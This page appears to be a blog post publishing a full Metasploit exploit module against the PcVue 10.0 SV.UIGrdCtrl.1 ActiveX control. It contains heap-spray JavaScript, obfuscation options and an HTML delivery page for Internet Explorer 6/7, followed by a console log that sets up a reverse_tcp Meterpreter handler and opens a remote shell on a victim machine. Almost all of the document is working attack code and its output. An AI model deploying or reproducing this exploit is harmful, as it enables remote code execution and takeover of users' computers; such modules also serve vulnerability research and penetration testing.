read, write, eXecute…

PcVue ⇐ 10.0 SV.UIGrdCtrl.1 SaveObject() Trusted DWORD vulnerability download
##
# $Id: pcvue_func.rb 14034 2011-10-23 11:56:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = AverageRanking

        include Msf::Exploit::Remote::HttpServer::HTML

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => "PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",
                        'Description'    => %q{
                                This module exploits a function pointer control within SVUIGrd.ocx of PcVue 10.0.
                                By setting a dword value for the SaveObject() or LoadObject(), an attacker can
                                overwrite a function pointer and execute arbitrary code.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'Luigi Auriemma', # original find
                                        'mr_me <steventhomasseeley[at]gmail-com>',       # msf module
                                        'TecR0c <roccogiovannicalvi[at]gmail-com >',# msf module
                                ],
                        'Version'        => '$Revision: 14034 $',
                        'References'     =>
                                [
                                        [ 'BID', '49795'],
                                        [ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                        'InitialAutoRunScript' => 'migrate -f'
                                },
                        'Payload'        =>
                                {
                                        'Space'           => 1024,
                                        'BadChars'        => "\x00\x0a\x0d",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [
                                                #IE 6/7 on Widnows XP and Vista
                                                'Internet Explorer 6 / Internet Explorer 7',
                                                {
                                                        'Ret'    => 0x0a0a0a0a,
                                                        'Offset' => 1000
                                                }
                                        ]
                                ],
                        'DisclosureDate' => 'Oct 5 2011',
                        'DefaultTarget'  => 0))

                        register_options(
                                [
                                        OptString.new('FILENAME', [ false, 'The file name.',  'msf.html']),
                                        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]),
                                ], self.class)
        end

        def on_request_uri(cli, request)

                #If not IE, we don't continue
                agent = request.headers['User-Agent']
                if agent !~ /MSIE [6|7]\.0/
                        print_error("Target not supported: #{agent.to_s}")
                        send_not_found(cli)
                        return
                end

                # Encode the shellcode
                shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

                # Setup exploit buffers
                nops      = Rex::Text.to_unescape([target.ret].pack('V'))
                ret       = "0x%08x" % target.ret

                blocksize = 0x50000
                fillto    = 200

                # Randomize the javascript variable names
                obj_name     = rand_text_alpha(rand(100) + 1)
                j_shellcode  = rand_text_alpha(rand(100) + 1)
                j_nops       = rand_text_alpha(rand(100) + 1)
                j_ret        = rand_text_alpha(rand(100) + 1)
                j_headersize = rand_text_alpha(rand(100) + 1)
                j_slackspace = rand_text_alpha(rand(100) + 1)
                j_fillblock  = rand_text_alpha(rand(100) + 1)
                j_block      = rand_text_alpha(rand(100) + 1)
                j_memory     = rand_text_alpha(rand(100) + 1)
                j_counter    = rand_text_alpha(rand(30) + 2)
                j_txt        = rand_text_alpha(rand(8) + 4)

                js = <<-EOS
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape("#{nops}");
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while(#{j_nops}.length < #{j_slackspace}) {
  #{j_nops} += #{j_nops};
}
var #{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
var #{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while((#{j_block}.length + #{j_slackspace}) < #{blocksize}) {
  #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
}

#{j_memory} = new Array();
for(#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++){
  #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode} ;
}

function main(){
  #{obj_name}.SaveObject("#{j_txt}.txt", #{ret}, 0);
}
EOS

                js = js.gsub(/^\t\t/, '')

                #JS obfuscation on demand
                if datastore['OBFUSCATE']
                        js = ::Rex::Exploitation::JSObfu.new(js)
                        js.obfuscate
                        main_sym = js.sym('main')
                else
                        main_sym = "main"
                end

                content = <<-EOS
<html>
<body>
<object classid='clsid:2BBD45A5-28AE-11D1-ACAC-0800170967D9' id='#{obj_name}' ></object>
<script language='javascript'>
#{js}
#{main_sym}();
</script>
</body>
</html>
EOS

                #Remove the extra tabs from content
                content = content.gsub(/^\t\t/, '')

                print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}")
                send_response(cli, content, {'Content-Type'=>'text/html'})
        end
end
example usage
[mr_me@neptune pcvue]$ msfconsole -r handle.rc

 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 742 exploits - 378 auxiliary - 86 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13848 updated today (2011.10.09)

resource (handle.rc)> use exploit/multi/handler
resource (handle.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (handle.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (handle.rc)> set RHOST 192.168.114.142
RHOST => 192.168.114.142
resource (handle.rc)> set LPORT 4444
LPORT => 4444
resource (handle.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Starting the payload handler...
msf  exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.114.142
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.142:1347) at 2011-10-10 15:15:07 +1100

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 2720 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\steve\Desktop>